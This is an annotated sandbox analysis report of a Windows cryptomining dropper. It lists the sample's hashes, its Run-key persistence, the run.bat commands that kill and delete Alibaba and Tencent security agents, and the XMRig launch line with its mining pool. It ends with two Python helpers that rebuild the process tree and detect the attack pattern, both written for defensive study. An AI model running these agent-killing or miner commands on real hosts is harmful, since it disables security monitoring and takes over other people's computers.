Analysis

max time kernel    140s
max time network   141s
platform           windows7_x64
resource           win7v20210410
submitted          04-05-2021 14:34
Tasks

Static task       static1
Behavioral task   behavioral1   sample: 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe   resource: win7v20210410
Behavioral task   behavioral2   sample: 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe   resource: win10v20210408

(The signatures, process tree and artifacts below are from behavioral1, the windows7_x64 run.)
General

Target   70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
Size     569KB
MD5      c85e27470e88ad0d0449ab68ef18d0a3
SHA1     4791330c3acf353772c3d073cc52a619eb4cd7cc
SHA256   70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
SHA512   39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01
Malware Config
Signatures

XMRig Miner Payload  (1 IoC)
  resource                                                                     yara_rule
  behavioral1/memory/644-95-0x000000013F2D0000-0x000000014023A000-memory.dmp   xmrig

Executes dropped EXE  (2 IoCs)
  pid    process
  1964   htttp.exe
  644    redis-server.exe

Stops running service(s)  (3 TTPs)

Loads dropped DLL  (2 IoCs)
  pid    process
  1964   htttp.exe
  1732   (no image name recorded for this entry)

Adds Run key to start application  (2 TTPs, 2 IoCs)
  description       ioc                                                                                                                                       process
  Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\httpd.exe = "C:\\Windows\\htttp.exe"                           htttp.exe
  Set value (str)   \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\httpd.exe = "C:\\Windows\\htttp.exe"   htttp.exe
  Note: the value is named httpd.exe (the Apache binary name) but launches C:\Windows\htttp.exe, the dropper's copy of itself (see the identical hashes under Downloads). Both the machine-wide Wow6432Node Run key and the user's Run key are written, so persistence survives whichever of the two a cleanup removes.

Drops file in Windows directory  (2 IoCs)
  description                    ioc                    process
  File opened for modification   C:\Windows\htttp.exe   70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
  File created                   C:\Windows\htttp.exe   70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
Launches sc.exe
  sc.exe is the Windows utility for controlling services. Here it is used to stop and then delete the targeted security-agent services (see the process tree).

Enumerates physical storage devices  (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox's generic description for this signature calls it likely ransomware behaviour; in this sample the payload is an XMRig miner and the report records no encryption activity, so treat this signature as low-signal here.
Enumerates processes with tasklist  (1 TTP, 4 IoCs)
  pid    process
  1472   tasklist.exe
  316    tasklist.exe
  1072   tasklist.exe
  552    tasklist.exe

Kills process with taskkill  (10 IoCs)
  pid    process
  1608   taskkill.exe
  436    taskkill.exe
  1656   taskkill.exe
  536    taskkill.exe
  824    taskkill.exe
  1720   taskkill.exe
  916    taskkill.exe
  1736   taskkill.exe
  2012   taskkill.exe
  1320   taskkill.exe

Suspicious use of AdjustPrivilegeToken  (16 IoCs)
  token                   pid    process
  SeDebugPrivilege        1072   tasklist.exe
  SeDebugPrivilege        552    tasklist.exe
  SeDebugPrivilege        1472   tasklist.exe
  SeDebugPrivilege        316    tasklist.exe
  SeDebugPrivilege        1736   taskkill.exe
  SeDebugPrivilege        1608   taskkill.exe
  SeDebugPrivilege        2012   taskkill.exe
  SeDebugPrivilege        1320   taskkill.exe
  SeDebugPrivilege        436    taskkill.exe
  SeDebugPrivilege        1656   taskkill.exe
  SeDebugPrivilege        536    taskkill.exe
  SeDebugPrivilege        824    taskkill.exe
  SeDebugPrivilege        1720   taskkill.exe
  SeDebugPrivilege        916    taskkill.exe
  SeLockMemoryPrivilege   644    redis-server.exe
  SeLockMemoryPrivilege   644    redis-server.exe
  Note: SeDebugPrivilege is what tasklist/taskkill enable to enumerate and terminate processes of other users; SeLockMemoryPrivilege is what XMRig enables to back its scratchpad with large pages, which is why the miner (running as redis-server.exe) requests it.

Suspicious use of WriteProcessMemory  (64 IoCs)
  Every parent->child pair below is recorded four times in the report; the 64 entries collapse to these 16 unique pairs.
  parent pid   parent                                                                   child pid   child
  1088         70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe    1964        htttp.exe
  1964         htttp.exe                                                                304         cmd.exe
  304          cmd.exe                                                                  1072        tasklist.exe
  304          cmd.exe                                                                  552         tasklist.exe
  304          cmd.exe                                                                  1472        tasklist.exe
  304          cmd.exe                                                                  316         tasklist.exe
  304          cmd.exe                                                                  1736        taskkill.exe
  304          cmd.exe                                                                  1608        taskkill.exe
  304          cmd.exe                                                                  2012        taskkill.exe
  304          cmd.exe                                                                  1320        taskkill.exe
  304          cmd.exe                                                                  436         taskkill.exe
  304          cmd.exe                                                                  588         sc.exe
  304          cmd.exe                                                                  1488        sc.exe
  304          cmd.exe                                                                  888         sc.exe
  304          cmd.exe                                                                  1604        sc.exe
  304          cmd.exe                                                                  776         sc.exe
  The list stops at 64 entries, so the remaining sc.exe and taskkill.exe children of cmd.exe (pid 304) and the redis-server.exe launch that appear in the process tree are not included here.
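The WriteProcessMemory list above is the raw material for reconstructing the process tree, but as printed it is four copies of every event run together on one line. The following parser is an added example written for this page, not part of the Triage report or of the sample; it takes entries in exactly the report's format ("PID <parent> wrote to memory of <child> <parent> <parent image> <child image>"), collapses the repeats into unique parent->child edges with a write count, and renders the tree. The SAMPLE string is a constructed excerpt of the report's own entries (five of the sixteen pairs), so the real list can be pasted in unchanged.

```python
import re
from collections import Counter, defaultdict

# One report entry: "PID <parent> wrote to memory of <child> <parent> <parent image> <child image>".
# The backreference \1 insists that the parent pid is repeated, which rejects half-parsed fragments.
ENTRY = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) (\S+)")

# Constructed excerpt of the report's entries (a subset of the 64; layout copied as printed).
SAMPLE = """
PID 1088 wrote to memory of 1964 1088 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe htttp.exe
PID 1088 wrote to memory of 1964 1088 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe htttp.exe
PID 1088 wrote to memory of 1964 1088 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe htttp.exe
PID 1088 wrote to memory of 1964 1088 70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe htttp.exe
PID 1964 wrote to memory of 304 1964 htttp.exe cmd.exe PID 1964 wrote to memory of 304 1964 htttp.exe cmd.exe
PID 1964 wrote to memory of 304 1964 htttp.exe cmd.exe PID 1964 wrote to memory of 304 1964 htttp.exe cmd.exe
PID 304 wrote to memory of 1072 304 cmd.exe tasklist.exe PID 304 wrote to memory of 1072 304 cmd.exe tasklist.exe
PID 304 wrote to memory of 1072 304 cmd.exe tasklist.exe PID 304 wrote to memory of 1072 304 cmd.exe tasklist.exe
PID 304 wrote to memory of 1736 304 cmd.exe taskkill.exe PID 304 wrote to memory of 1736 304 cmd.exe taskkill.exe
PID 304 wrote to memory of 1736 304 cmd.exe taskkill.exe PID 304 wrote to memory of 1736 304 cmd.exe taskkill.exe
PID 304 wrote to memory of 588 304 cmd.exe sc.exe PID 304 wrote to memory of 588 304 cmd.exe sc.exe
PID 304 wrote to memory of 588 304 cmd.exe sc.exe PID 304 wrote to memory of 588 304 cmd.exe sc.exe
"""


def parse_entries(text):
    """Every entry in order, repeats included: (ppid, pid, parent_image, child_image)."""
    return [(int(p), int(c), pi, ci) for p, c, pi, ci in ENTRY.findall(text)]


def collapse(entries):
    """Unique parent->child edges mapped to the number of times the write was recorded."""
    return Counter(entries)


def process_tree(edges):
    """Build {ppid: [(pid, child_image, writes)]} and find the roots (parents never seen as a child)."""
    children = defaultdict(list)
    parents, kids = set(), set()
    for (ppid, pid, _pimg, cimg), n in sorted(edges.items()):
        children[ppid].append((pid, cimg, n))
        parents.add(ppid)
        kids.add(pid)
    return children, sorted(parents - kids)


def render(children, pid, image, depth=0):
    """Indented text rendering of the subtree under pid, one line per process."""
    lines = [f"{'  ' * depth}{pid} {image}"]
    for cpid, cimg, n in children.get(pid, []):
        lines.extend(render(children, cpid, f"{cimg} (writes x{n})", depth + 1))
    return lines


def tree_text(text):
    """Full pipeline: report text -> collapsed edges -> rendered tree from the first root."""
    edges = collapse(parse_entries(text))
    children, roots = process_tree(edges)
    root_img = next(pimg for (ppid, _, pimg, _) in edges if ppid == roots[0])
    return "\n".join(render(children, roots[0], root_img))


if __name__ == "__main__":
    print(tree_text(SAMPLE))
```

Because the count survives the collapse, a pair recorded a different number of times than its siblings stands out in the rendered tree; for this report every pair is x4, which is what justifies reading the 64 entries as 16 process starts.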
Processes

[1] C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe"
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\htttp.exe
      cmd: "C:\Windows\htttp.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Adds Run key to start application
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c ""C:\Users\Admin\AppData\Local\Temp\run.bat" "
        - Suspicious use of WriteProcessMemory
        The batch file first checks for, then kills, host agents and stops and deletes their services. The names are those of Alibaba Cloud agents (Aliyun Assist, Aegis/AliHids) and Tencent agents (BaradAgent, sgagent/StargateSvc, YDLive/YDService, QQProtect/QPCore), i.e. the monitoring and security tooling found on Chinese cloud hosts. Two of the taskkill command lines carry a stray trailing quote, which is how they appear in run.bat.

      [4] C:\Windows\SysWOW64\tasklist.exe
          cmd: tasklist /FI " IMAGENAME eq Ali_update.exe"
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\tasklist.exe
          cmd: tasklist /FI " IMAGENAME eq aliyun_assist_service.exe"
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\tasklist.exe
          cmd: tasklist /FI " IMAGENAME eq aliyun_assist_update.exe"
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\tasklist.exe
          cmd: tasklist /FI " IMAGENAME eq aliyun_installer.exe"
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\taskkill.exe
          cmd: taskkill /F /IM aliyun_assist_service.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\taskkill.exe
          cmd: taskkill /F /IM aliyun_assist_update.exe"
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\taskkill.exe
          cmd: taskkill /F /IM aliyun_installer.exe"
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\taskkill.exe
          cmd: taskkill /F /IM Ali_update.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\taskkill.exe
          cmd: taskkill /F /IM AliHids.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\sc.exe
          cmd: sc stop "Alibaba Security Aegis Detect Service"

      [4] C:\Windows\SysWOW64\sc.exe
          cmd: sc stop "Alibaba Security Aegis Update Service"

      [4] C:\Windows\SysWOW64\sc.exe
          cmd: sc delete "Alibaba Security Aegis Detect Service"

      [4] C:\Windows\SysWOW64\sc.exe
          cmd: sc delete "Alibaba Security Aegis Update Service"

      [4] C:\Windows\SysWOW64\sc.exe
          cmd: sc stop "BaradAgentSvc"

      [4] C:\Windows\SysWOW64\sc.exe
          cmd: sc stop "StargateSvc"

      [4] C:\Windows\SysWOW64\sc.exe
          cmd: sc stop "QPCore"

      [4] C:\Windows\SysWOW64\sc.exe
          cmd: sc delete "BaradAgentSvc"

      [4] C:\Windows\SysWOW64\sc.exe
          cmd: sc delete "StargateSvc"

      [4] C:\Windows\SysWOW64\sc.exe
          cmd: sc delete "QPCore"

      [4] C:\Windows\SysWOW64\taskkill.exe
          cmd: taskkill /F /IM QQProtect.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\taskkill.exe
          cmd: taskkill /F /IM sgagent.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\taskkill.exe
          cmd: taskkill /F /IM BaradAgent.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\taskkill.exe
          cmd: taskkill /F /IM YDLive.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\SysWOW64\taskkill.exe
          cmd: taskkill /F /IM YDService.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

    [3] C:\Users\Admin\AppData\Local\Temp\redis-server.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\redis-server.exe" -o pool.fuck-jp.ru:8888 --nicehash true
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
        redis-server.exe is a renamed XMRig build (the xmrig yara rule matches its memory region 644-95). The arguments are XMRig's: -o sets the mining pool (pool.fuck-jp.ru:8888) and --nicehash true enables NiceHash-style job handling.
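The process tree above is a compact defense-evasion-then-mine sequence: one cmd.exe fires a burst of taskkill and sc stop/delete commands at known agent names, then the miner is started with a pool URL. The following detection logic is an added example written for this page; it is not part of the Triage report and not the sample's own code. It assumes Sysmon-style process-creation events reduced to dicts with pid, ppid, image and cmdline; the EVENTS list is constructed from the command lines and pids in this report (plus one benign taskkill as a control), the agent and service names are the ones the sample targets, and the pool regex matches XMRig's "-o host:port" form as seen in the command line. check_run_value applies the same idea to the Run-key IoC from the Signatures section: a value whose target sits directly in C:\Windows and whose name does not match the binary it launches.

```python
import re
from collections import defaultdict
from ntpath import basename, dirname   # ntpath parses Windows paths on any host OS

# Agent processes and services run.bat targets in this sample (names from the process tree).
TARGETED_AGENTS = {
    "ali_update.exe", "aliyun_assist_service.exe", "aliyun_assist_update.exe",
    "aliyun_installer.exe", "alihids.exe", "qqprotect.exe", "sgagent.exe",
    "baradagent.exe", "ydlive.exe", "ydservice.exe",
}
TARGETED_SERVICES = {
    "alibaba security aegis detect service", "alibaba security aegis update service",
    "baradagentsvc", "stargatesvc", "qpcore",
}

TASKKILL = re.compile(r'\btaskkill\b.*?/IM\s+"?([^\s"]+)', re.I)   # tolerates the stray trailing quote
SC_CMD = re.compile(r'\bsc\s+(stop|delete)\s+"?([^"]+?)"?\s*$', re.I)
POOL = re.compile(r'(?:^|\s)-o\s+([\w.-]+:\d+)')                    # xmrig-style "-o host:port"


def classify(cmdline):
    """Tag one process command line. Returns a list of (tag, detail) tuples."""
    tags = []
    m = TASKKILL.search(cmdline)
    if m and m.group(1).lower() in TARGETED_AGENTS:
        tags.append(("agent_kill", m.group(1).lower()))
    m = SC_CMD.search(cmdline)
    if m and m.group(2).strip().lower() in TARGETED_SERVICES:
        tags.append(("service_" + m.group(1).lower(), m.group(2).strip()))
    m = POOL.search(cmdline)
    if m and "--nicehash" in cmdline.lower():
        tags.append(("miner_launch", m.group(1)))
    return tags


def _stem(name):
    """File name without directory or extension, lower-cased, so 'httpd.exe' and 'htttp' compare."""
    return basename(name).lower().rsplit(".", 1)[0]


def check_run_value(value_name, data):
    """Flags for one Run-key value: a target dropped directly in C:\\Windows (not a subfolder),
    and a value name that does not match the executable it launches (httpd.exe -> htttp.exe here)."""
    path = data.strip().strip('"')
    flags = []
    if dirname(path).lower().rstrip("\\") == "c:\\windows":
        flags.append("run_value_in_windows_root")
    if _stem(value_name) != _stem(path):
        flags.append("run_value_name_mismatch")
    return flags


def scan(events, min_actions=3):
    """Group agent kills and service stop/delete actions by parent pid and report any parent that
    issues at least min_actions of them (here the cmd.exe running run.bat), plus miner launches."""
    per_parent = defaultdict(list)
    miners = []
    for ev in events:
        for tag, detail in classify(ev["cmdline"]):
            if tag == "miner_launch":
                miners.append((ev["pid"], detail))
            else:
                per_parent[ev["ppid"]].append((tag, detail))
    takedowns = {ppid: acts for ppid, acts in per_parent.items() if len(acts) >= min_actions}
    return {"agent_takedown": takedowns, "miner_launch": miners}


# Constructed events: command lines and pids taken from this report's process tree, plus one
# benign taskkill (pid 900) as a control that must not be tagged.
EVENTS = [
    {"pid": 304, "ppid": 1964, "image": "cmd.exe",
     "cmdline": 'cmd /c ""C:\\Users\\Admin\\AppData\\Local\\Temp\\run.bat" "'},
    {"pid": 1072, "ppid": 304, "image": "tasklist.exe",
     "cmdline": 'tasklist /FI " IMAGENAME eq Ali_update.exe"'},
    {"pid": 1736, "ppid": 304, "image": "taskkill.exe",
     "cmdline": "taskkill /F /IM aliyun_assist_service.exe"},
    {"pid": 1608, "ppid": 304, "image": "taskkill.exe",
     "cmdline": 'taskkill /F /IM aliyun_assist_update.exe"'},   # stray quote as in run.bat
    {"pid": 588, "ppid": 304, "image": "sc.exe",
     "cmdline": 'sc stop "Alibaba Security Aegis Detect Service"'},
    {"pid": 888, "ppid": 304, "image": "sc.exe",
     "cmdline": 'sc delete "Alibaba Security Aegis Detect Service"'},
    {"pid": 644, "ppid": 1964, "image": "redis-server.exe",
     "cmdline": '"C:\\Users\\Admin\\AppData\\Local\\Temp\\redis-server.exe" -o pool.fuck-jp.ru:8888 --nicehash true'},
    {"pid": 900, "ppid": 1, "image": "taskkill.exe",
     "cmdline": "taskkill /F /IM notepad.exe"},
]

if __name__ == "__main__":
    print(scan(EVENTS))
    print(check_run_value("httpd.exe", '"C:\\Windows\\htttp.exe"'))
```

Grouping by parent is what separates this from a single-event rule: an administrator stopping one service is one action, whereas run.bat produces a dozen from one cmd.exe within seconds. The Run-key name mismatch is weak on its own (many legitimate values use a display name), which is why check_run_value returns both flags and leaves the weighting to the caller.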
Downloads

C:\Users\Admin\AppData\Local\Temp\redis-server.exe
  (also recorded under the drive-less path \Users\Admin\AppData\Local\Temp\redis-server.exe, same hashes; the XMRig payload)
  MD5      0c4ae60bb07bd7c084ca66b844fa0b4b
  SHA1     ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80
  SHA256   31cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e
  SHA512   5dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d

C:\Users\Admin\AppData\Local\Temp\run.bat
  (the agent-killing batch script executed by cmd.exe, pid 304)
  MD5      f1cc668d01eeb779b1fc1044541fc1d4
  SHA1     45bd782881b31eb2868fc211b19af2cb627a9d0d
  SHA256   62fdc9b8581a931ac987446ab4c8547bb9f94d9caf8e61c3d0d95ec033e73929
  SHA512   293263607a850f2bb6873924b6606b83c7ea0dbd9fa07c0d8958be9e64aa1b27e24a0cf213b89906b3919c32da3c265d3ae9df07430ab4441b7289b3e935c33e

C:\Windows\htttp.exe
  (hashes identical to the submitted sample: the dropper copies itself to C:\Windows\htttp.exe and registers that copy under the Run keys)
  MD5      c85e27470e88ad0d0449ab68ef18d0a3
  SHA1     4791330c3acf353772c3d073cc52a619eb4cd7cc
  SHA256   70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
  SHA512   39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01
Memory dumps

dump                                                                  size
memory/304-63-0x0000000000000000-mapping.dmp
memory/316-69-0x0000000000000000-mapping.dmp
memory/436-74-0x0000000000000000-mapping.dmp
memory/536-86-0x0000000000000000-mapping.dmp
memory/552-66-0x0000000000000000-mapping.dmp
memory/588-75-0x0000000000000000-mapping.dmp
memory/644-95-0x000000013F2D0000-0x000000014023A000-memory.dmp      15.4MB   (xmrig yara match)
memory/644-96-0x0000000000310000-0x0000000000330000-memory.dmp      128KB
memory/644-91-0x0000000000000000-mapping.dmp
memory/776-79-0x0000000000000000-mapping.dmp
memory/824-87-0x0000000000000000-mapping.dmp
memory/888-77-0x0000000000000000-mapping.dmp
memory/916-89-0x0000000000000000-mapping.dmp
memory/1072-65-0x0000000000000000-mapping.dmp
memory/1088-59-0x00000000753B1000-0x00000000753B3000-memory.dmp     8KB
memory/1088-83-0x0000000000000000-mapping.dmp
memory/1320-73-0x0000000000000000-mapping.dmp
memory/1472-67-0x0000000000000000-mapping.dmp
memory/1488-76-0x0000000000000000-mapping.dmp
memory/1604-78-0x0000000000000000-mapping.dmp
memory/1608-71-0x0000000000000000-mapping.dmp
memory/1612-82-0x0000000000000000-mapping.dmp
memory/1656-85-0x0000000000000000-mapping.dmp
memory/1708-81-0x0000000000000000-mapping.dmp
memory/1720-88-0x0000000000000000-mapping.dmp
memory/1732-80-0x0000000000000000-mapping.dmp
memory/1736-70-0x0000000000000000-mapping.dmp
memory/1964-60-0x0000000000000000-mapping.dmp
memory/1984-84-0x0000000000000000-mapping.dmp
memory/2012-72-0x0000000000000000-mapping.dmp